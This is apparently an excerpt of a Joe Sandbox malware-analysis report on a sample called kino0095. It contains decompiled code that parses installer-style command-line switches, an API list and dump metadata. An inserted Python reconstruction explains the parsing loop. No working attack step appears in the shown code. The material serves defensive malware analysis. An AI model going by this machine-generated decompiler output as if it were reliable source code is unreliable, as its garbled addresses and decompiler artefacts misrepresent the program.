						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E010B6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                    													_t177 = _t177 + 1;
                                                                                                                                                                                                                                    													_t202 = _t202 + 1;
                                                                                                                                                                                                                                    													_t157 = 2;
                                                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t157 = 1;
                                                                                                                                                                                                                                    												if(_t213 != 0) {
                                                                                                                                                                                                                                    													_t163 = 1;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t213 = 1;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L30;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L131;
                                                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                                                    								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                    								_t69 = _v272;
                                                                                                                                                                                                                                    							} while ( *_t69 != 0);
                                                                                                                                                                                                                                    							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                    								E010B6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                    								asm("int3");
                                                                                                                                                                                                                                    								_push(_t221);
                                                                                                                                                                                                                                    								_t222 = _t223;
                                                                                                                                                                                                                                    								_t71 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                    								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                    									0x4f0 = 2;
                                                                                                                                                                                                                                    									_t75 = E010B597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E010B44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                    									 *0x10b9124 = E010B6285();
                                                                                                                                                                                                                                    									_t75 = 0;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								return E010B6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                                                    										goto L34;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										goto L40;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									if(_t163 != 0) {
                                                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                                                    										_t79 = _v268;
                                                                                                                                                                                                                                    										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                    											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                    											if(_t83 == 0) {
                                                                                                                                                                                                                                    												_t202 = 0x521;
                                                                                                                                                                                                                                    												E010B44B9(0, 0x521, 0x10b1140, 0, 0x40, 0);
                                                                                                                                                                                                                                    												_t85 =  *0x10b8588; // 0x0
                                                                                                                                                                                                                                    												if(_t85 != 0) {
                                                                                                                                                                                                                                    													CloseHandle(_t85);
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												ExitProcess(0);
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t87 = _t83 - 4;
                                                                                                                                                                                                                                    											if(_t87 == 0) {
                                                                                                                                                                                                                                    												if(_v266 != 0) {
                                                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                    														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                    														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                    														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                    														_t202 = _t50;
                                                                                                                                                                                                                                    														do {
                                                                                                                                                                                                                                    															_t88 =  *_t183;
                                                                                                                                                                                                                                    															_t183 = _t183 + 1;
                                                                                                                                                                                                                                    														} while (_t88 != 0);
                                                                                                                                                                                                                                    														if(_t183 == _t202) {
                                                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t205 = 0x5b;
                                                                                                                                                                                                                                    															if(E010B667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                    																L115:
                                                                                                                                                                                                                                    																_t206 = 0x5d;
                                                                                                                                                                                                                                    																if(E010B667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                    																	L117:
                                                                                                                                                                                                                                    																	_t202 =  &_v276;
                                                                                                                                                                                                                                    																	_v276 = _t167;
                                                                                                                                                                                                                                    																	if(E010B5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		_t202 = 0x104;
                                                                                                                                                                                                                                    																		E010B1680(0x10b8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	_t202 = 0x5b;
                                                                                                                                                                                                                                    																	if(E010B667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                    																		goto L49;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		goto L117;
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																_t202 = 0x5d;
                                                                                                                                                                                                                                    																if(E010B667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	goto L115;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													 *0x10b8a24 = 1;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L50;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t100 = _t87 - 1;
                                                                                                                                                                                                                                    												if(_t100 == 0) {
                                                                                                                                                                                                                                    													L98:
                                                                                                                                                                                                                                    													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    														goto L49;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                    														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                    														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                    														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                    														_t202 = _t38;
                                                                                                                                                                                                                                    														do {
                                                                                                                                                                                                                                    															_t101 =  *_t192;
                                                                                                                                                                                                                                    															_t192 = _t192 + 1;
                                                                                                                                                                                                                                    														} while (_t101 != 0);
                                                                                                                                                                                                                                    														if(_t192 == _t202) {
                                                                                                                                                                                                                                    															goto L49;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t202 =  &_v276;
                                                                                                                                                                                                                                    															_v276 = _t170;
                                                                                                                                                                                                                                    															if(E010B5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                    																_t218 = 0x10b8b3e;
                                                                                                                                                                                                                                    																_t105 = _v276;
                                                                                                                                                                                                                                    																if(_t104 != 0x54) {
                                                                                                                                                                                                                                    																	_t218 = 0x10b8a3a;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    																E010B1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                    																_t202 = 0x104;
                                                                                                                                                                                                                                    																E010B658A(_t218, 0x104, 0x10b1140);
                                                                                                                                                                                                                                    																if(E010B31E0(_t218) != 0) {
                                                                                                                                                                                                                                    																	goto L50;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	goto L106;
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                    													if(_t111 == 0) {
                                                                                                                                                                                                                                    														if(_v266 != 0) {
                                                                                                                                                                                                                                    															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    																goto L49;
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																_t199 = _v265;
                                                                                                                                                                                                                                    																if(_t199 != 0) {
                                                                                                                                                                                                                                    																	_t219 =  &_v265;
                                                                                                                                                                                                                                    																	do {
                                                                                                                                                                                                                                    																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                    																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                    																		if(_t115 == 0) {
                                                                                                                                                                                                                                    																			 *0x10b8a2c = 1;
                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                    																			_t200 = 2;
                                                                                                                                                                                                                                    																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                    																			if(_t119 == 0) {
                                                                                                                                                                                                                                    																				 *0x10b8a30 = 1;
                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                    																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                    																					 *0x10b8a34 = 1;
                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                    																					_t209 = 0;
                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																		_t118 =  *_t219;
                                                                                                                                                                                                                                    																		_t199 = _t118;
                                                                                                                                                                                                                                    																	} while (_t118 != 0);
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															 *0x10b8a2c = 1;
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    														goto L50;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														_t127 = _t111 - 3;
                                                                                                                                                                                                                                    														if(_t127 == 0) {
                                                                                                                                                                                                                                    															if(_v266 != 0) {
                                                                                                                                                                                                                                    																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    																	goto L49;
                                                                                                                                                                                                                                    																} else {
                                                                                                                                                                                                                                    																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                    																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                    																		goto L76;
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                    																			goto L83;
                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                    																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                    																				goto L76;
                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                    																				goto L49;
                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															} else {
                                                                                                                                                                                                                                    																L76:
                                                                                                                                                                                                                                    																_push(2);
                                                                                                                                                                                                                                    																_pop(1);
                                                                                                                                                                                                                                    																L83:
                                                                                                                                                                                                                                    																 *0x10b8a38 = 1;
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    															goto L50;
                                                                                                                                                                                                                                    														} else {
                                                                                                                                                                                                                                    															_t132 = _t127 - 1;
                                                                                                                                                                                                                                    															if(_t132 == 0) {
                                                                                                                                                                                                                                    																if(_v266 != 0) {
                                                                                                                                                                                                                                    																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                    																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                    																			goto L49;
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	} else {
                                                                                                                                                                                                                                    																		_t201 = _v265;
																		 *0x10b9a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x10b9a2c =  *0x10b9a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x10b8d48 =  *0x10b8d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x10b9a2c =  *0x10b9a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x10b9a2c =  *0x10b9a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x10b8d48 =  *0x10b8d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x10b9a2c =  *0x10b9a2c | 0x00000004;
																										L70:
																										 *0x10b8a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x10b9a2c = 3;
																	 *0x10b8a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x10b8a2c != 0 &&  *0x10b8b3e == 0) {
						if(GetModuleFileNameA( *0x10b9a3c, 0x10b8b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E010B66C8(0x10b8b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}
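The dispatch in the loop above is easier to follow once the chained subtractions are folded back into character codes: CharUpperA(c) - 0x41 is compared against 0, 3, 8, 13 and 16, i.e. the upper-cased characters 'A', 'D', 'I', 'N' and 'Q', and every match except 'D' falls through to L70, which sets *0x10b8a28. The branch that ORs 0x80 into *0x10b8d48 (_t149 == 0) cannot be taken as the listing is written, because _t149 is a plain copy of _t147 and the _t147 == 0 case was already handled one level up. The Python below is an added reconstruction for readers of this report, not code from the sample or from Joe Sandbox: the variable names are placeholders for the globals at 0x10b9a2c, 0x10b8d48 and 0x10b8a28, the purpose of each switch letter is not known and is not assumed, the initial value of _t209 is taken to be 1 (only its clearing is visible), and E010B66C8 is assumed to be a strrchr-style "find last occurrence" routine because it is called with 0x5c ('\') and the byte after its return value is zeroed. The input paths and switch strings are constructed.

```python
# Added reconstruction of the switch-character loop and the module-directory
# step in the decompiled listing above. Not the sample's code: names are
# placeholders for the globals at 0x10b9a2c, 0x10b8d48 and 0x10b8a28, and
# E010B66C8 is assumed to be a strrchr-style "find last occurrence" routine.


def char_upper_a(c: str) -> int:
    """ASCII-only stand-in for CharUpperA applied to a single byte."""
    b = ord(c)
    return b - 0x20 if 0x61 <= b <= 0x7A else b


def parse_switch_chars(chars: str) -> dict:
    """Replay the do/while loop over a run of switch characters.

    Returns the three globals and _t209 after the loop. Initial state follows
    the listing: *0x10b9a2c has just been set to 1; the other two globals are
    taken as 0 and _t209 as 1 (assumptions, only their later writes are shown).
    """
    g_10b9a2c = 1
    g_10b8d48 = 0
    g_10b8a28 = 0
    t209 = 1
    for c in chars:
        k = char_upper_a(c) - 0x41          # _t142 = CharUpperA(c) - 'A'
        if k == 0:                          # 'A'
            g_10b9a2c |= 2
            g_10b8a28 = 1                   # goto L70
        elif k == 3:                        # 'D'  (_t145 == 0)
            g_10b8d48 |= 0x40               # the one case that skips L70
        elif k == 8:                        # 'I'  (_t146 == 0)
            g_10b9a2c &= ~2
            g_10b8a28 = 1                   # goto L70
        elif k == 13:                       # 'N'  (_t147 == 0)
            g_10b9a2c &= ~1
            g_10b8a28 = 1                   # goto L70
        elif k == 16:                       # 'Q'  (_t149 == 3)
            g_10b9a2c |= 4
            g_10b8a28 = 1                   # falls into L70
        else:                               # any other character clears _t209
            t209 = 0
        # "_t149 == 0 -> *0x10b8d48 |= 0x80" is unreachable as listed, so it
        # has no counterpart here.
    return {"0x10b9a2c": g_10b9a2c, "0x10b8d48": g_10b8d48,
            "0x10b8a28": g_10b8a28, "_t209": t209}


def module_directory(module_path: str) -> str:
    """Replay the GetModuleFileNameA branch: zero the byte after the last
    backslash, which leaves the module's directory with a trailing backslash."""
    last = module_path.rfind("\\")          # E010B66C8(buf, 0x5c), assumed strrchr-like
    if last < 0:
        # A strrchr-style routine returns NULL here and the listing would then
        # write to address 1; surface that instead of guessing at behaviour.
        raise ValueError("no backslash in module path")
    return module_path[: last + 1]


if __name__ == "__main__":
    # Constructed inputs, not values observed in the sandbox run.
    print(parse_switch_chars("AIQ"))
    print(module_directory("C:\\example\\szDGo5lHdI.exe"))
```

Running the module prints the global state after "AIQ" (0x10b9a2c ends at 5: 'A' sets bit 1, 'I' clears it again, 'Q' adds bit 2) and the directory "C:\example\" for the constructed path; a character outside the five recognised letters leaves every global untouched and only clears _t209.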
Address column of the decompiled view (detached from its source lines during extraction; 0x00000000 entries belong to lines that carry no instruction address): 0x010b5c9e 0x010b5ca9 0x010b5cb0 0x010b5cb3 0x010b5cb6 0x010b5cb7 0x010b5cb8 0x010b5cbd 0x010b6204 0x010b5ccb 0x00000000 0x010b5ccb 0x010b5cd3 0x010b5cd7 0x010b5cf4 0x00000000 0x010b5cf4 0x010b5cf8 0x010b5d00 0x00000000 0x010b5d06 0x010b5d06 0x010b5d0e 0x010b5d10 0x010b5d12 0x010b5d14 0x010b5d15 0x010b5d17 0x010b5d49 0x00000000 0x00000000 0x00000000 0x00000000 0x010b5d19 0x010b5d19 0x010b5d1d 0x00000000 0x010b5d3f 0x010b5d3f 0x010b5d4b 0x010b5d4b 0x010b5d4f 0x010b5d8d 0x00000000 0x010b5d93 0x010b5d93 0x010b5d9a 0x010b5d9d 0x010b5d9e 0x00000000
                                                                                                                                                                                                                                    0x010b5d9e
                                                                                                                                                                                                                                    0x010b5d51
                                                                                                                                                                                                                                    0x010b5d5b
                                                                                                                                                                                                                                    0x010b5d72
                                                                                                                                                                                                                                    0x010b60fb
                                                                                                                                                                                                                                    0x010b60fb
                                                                                                                                                                                                                                    0x010b6207
                                                                                                                                                                                                                                    0x010b620a
                                                                                                                                                                                                                                    0x010b620b
                                                                                                                                                                                                                                    0x010b620e
                                                                                                                                                                                                                                    0x010b6217
                                                                                                                                                                                                                                    0x010b5d78
                                                                                                                                                                                                                                    0x010b5d78
                                                                                                                                                                                                                                    0x010b5d80
                                                                                                                                                                                                                                    0x010b5d83
                                                                                                                                                                                                                                    0x010b5d84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d84
                                                                                                                                                                                                                                    0x010b5d5d
                                                                                                                                                                                                                                    0x010b5d5f
                                                                                                                                                                                                                                    0x010b5d62
                                                                                                                                                                                                                                    0x010b5d68
                                                                                                                                                                                                                                    0x010b5d64
                                                                                                                                                                                                                                    0x010b5d64
                                                                                                                                                                                                                                    0x010b5d64
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d62
                                                                                                                                                                                                                                    0x010b5d5b
                                                                                                                                                                                                                                    0x010b5d4f
                                                                                                                                                                                                                                    0x010b5d1d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d9f
                                                                                                                                                                                                                                    0x010b5d9f
                                                                                                                                                                                                                                    0x010b5da5
                                                                                                                                                                                                                                    0x010b5dab
                                                                                                                                                                                                                                    0x010b5dba
                                                                                                                                                                                                                                    0x010b6218
                                                                                                                                                                                                                                    0x010b621d
                                                                                                                                                                                                                                    0x010b6220
                                                                                                                                                                                                                                    0x010b6221
                                                                                                                                                                                                                                    0x010b6229
                                                                                                                                                                                                                                    0x010b6230
                                                                                                                                                                                                                                    0x010b6247
                                                                                                                                                                                                                                    0x010b626a
                                                                                                                                                                                                                                    0x010b6272
                                                                                                                                                                                                                                    0x010b6249
                                                                                                                                                                                                                                    0x010b6255
                                                                                                                                                                                                                                    0x010b625f
                                                                                                                                                                                                                                    0x010b6264
                                                                                                                                                                                                                                    0x010b6264
                                                                                                                                                                                                                                    0x010b6284
                                                                                                                                                                                                                                    0x010b5dc0
                                                                                                                                                                                                                                    0x010b5dc0
                                                                                                                                                                                                                                    0x010b5dca
                                                                                                                                                                                                                                    0x010b5e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5dcc
                                                                                                                                                                                                                                    0x010b5dce
                                                                                                                                                                                                                                    0x010b5e24
                                                                                                                                                                                                                                    0x010b5e24
                                                                                                                                                                                                                                    0x010b5e2c
                                                                                                                                                                                                                                    0x010b5e47
                                                                                                                                                                                                                                    0x010b5e4a
                                                                                                                                                                                                                                    0x010b61d2
                                                                                                                                                                                                                                    0x010b61e2
                                                                                                                                                                                                                                    0x010b61e7
                                                                                                                                                                                                                                    0x010b61ee
                                                                                                                                                                                                                                    0x010b61f1
                                                                                                                                                                                                                                    0x010b61f1
                                                                                                                                                                                                                                    0x010b61f8
                                                                                                                                                                                                                                    0x010b61f8
                                                                                                                                                                                                                                    0x010b5e50
                                                                                                                                                                                                                                    0x010b5e53
                                                                                                                                                                                                                                    0x010b6109
                                                                                                                                                                                                                                    0x010b611f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6125
                                                                                                                                                                                                                                    0x010b6137
                                                                                                                                                                                                                                    0x010b613a
                                                                                                                                                                                                                                    0x010b613c
                                                                                                                                                                                                                                    0x010b613e
                                                                                                                                                                                                                                    0x010b613e
                                                                                                                                                                                                                                    0x010b6141
                                                                                                                                                                                                                                    0x010b6141
                                                                                                                                                                                                                                    0x010b6143
                                                                                                                                                                                                                                    0x010b6144
                                                                                                                                                                                                                                    0x010b614a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b6150
                                                                                                                                                                                                                                    0x010b6152
                                                                                                                                                                                                                                    0x010b615c
                                                                                                                                                                                                                                    0x010b6170
                                                                                                                                                                                                                                    0x010b6172
                                                                                                                                                                                                                                    0x010b617c
                                                                                                                                                                                                                                    0x010b6190
                                                                                                                                                                                                                                    0x010b6190
                                                                                                                                                                                                                                    0x010b6196
                                                                                                                                                                                                                                    0x010b61a5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b61ab
                                                                                                                                                                                                                                    0x010b61b9
                                                                                                                                                                                                                                    0x010b61c6
                                                                                                                                                                                                                                    0x010b61c6
                                                                                                                                                                                                                                    0x010b617e
                                                                                                                                                                                                                                    0x010b6180
                                                                                                                                                                                                                                    0x010b618a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b618a
                                                                                                                                                                                                                                    0x010b615e
                                                                                                                                                                                                                                    0x010b6160
                                                                                                                                                                                                                                    0x010b5f22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5efe
                                                                                                                                                                                                                                    0x010b5eff
                                                                                                                                                                                                                                    0x010b5f02
                                                                                                                                                                                                                                    0x010b5f16
                                                                                                                                                                                                                                    0x010b5f04
                                                                                                                                                                                                                                    0x010b5f07
                                                                                                                                                                                                                                    0x010b5f0d
                                                                                                                                                                                                                                    0x010b5f46
                                                                                                                                                                                                                                    0x010b5f46
                                                                                                                                                                                                                                    0x010b5f09
                                                                                                                                                                                                                                    0x010b5f09
                                                                                                                                                                                                                                    0x010b5f09
                                                                                                                                                                                                                                    0x010b5f07
                                                                                                                                                                                                                                    0x010b5f02
                                                                                                                                                                                                                                    0x010b5efc
                                                                                                                                                                                                                                    0x010b5ef7
                                                                                                                                                                                                                                    0x010b5ef2
                                                                                                                                                                                                                                    0x010b5f4c
                                                                                                                                                                                                                                    0x010b5f4e
                                                                                                                                                                                                                                    0x010b5f50
                                                                                                                                                                                                                                    0x010b5f54
                                                                                                                                                                                                                                    0x010b5ed4
                                                                                                                                                                                                                                    0x010b5ea2
                                                                                                                                                                                                                                    0x010b5ea4
                                                                                                                                                                                                                                    0x010b5eaf
                                                                                                                                                                                                                                    0x010b5eaf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e79
                                                                                                                                                                                                                                    0x010b5e7d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e83
                                                                                                                                                                                                                                    0x010b5e83
                                                                                                                                                                                                                                    0x010b5e83
                                                                                                                                                                                                                                    0x010b5e85
                                                                                                                                                                                                                                    0x010b5e85
                                                                                                                                                                                                                                    0x010b5e8e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5e94
                                                                                                                                                                                                                                    0x010b5e8e
                                                                                                                                                                                                                                    0x010b5e7d
                                                                                                                                                                                                                                    0x010b5e77
                                                                                                                                                                                                                                    0x010b5e6e
                                                                                                                                                                                                                                    0x010b5e65
                                                                                                                                                                                                                                    0x010b5e5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5dd0
                                                                                                                                                                                                                                    0x010b5dce
                                                                                                                                                                                                                                    0x010b5dca
                                                                                                                                                                                                                                    0x010b5dba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b5d00
                                                                                                                                                                                                                                    0x010b5dd9
                                                                                                                                                                                                                                    0x010b5e04
                                                                                                                                                                                                                                    0x010b61fe
                                                                                                                                                                                                                                    0x010b5e0a
                                                                                                                                                                                                                                    0x010b5e0c
                                                                                                                                                                                                                                    0x010b5e17
                                                                                                                                                                                                                                    0x010b5e17
                                                                                                                                                                                                                                    0x010b5e04
                                                                                                                                                                                                                                    0x010b6200
                                                                                                                                                                                                                                    0x010b6200
                                                                                                                                                                                                                                    0x00000000

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 010B5CEE
• GetModuleFileNameA.KERNEL32(010B8B3E,00000104,00000000,?,?), ref: 010B5DFC
• CharUpperA.USER32(?), ref: 010B5E3E
• CharUpperA.USER32(-00000052), ref: 010B5EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 010B5F6F
• CharUpperA.USER32(?), ref: 010B5FA7
• CharUpperA.USER32(-0000004E), ref: 010B6008
• CharUpperA.USER32(?), ref: 010B60AA
• CloseHandle.KERNEL32(00000000,010B1140,00000000,00000040,00000000), ref: 010B61F1
• ExitProcess.KERNEL32 ref: 010B61F8
Strings
Memory Dump Source
• Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
• Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
Similarity
• API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
• String ID: "$"$:$RegServer
• API String ID: 1203814774-25366791
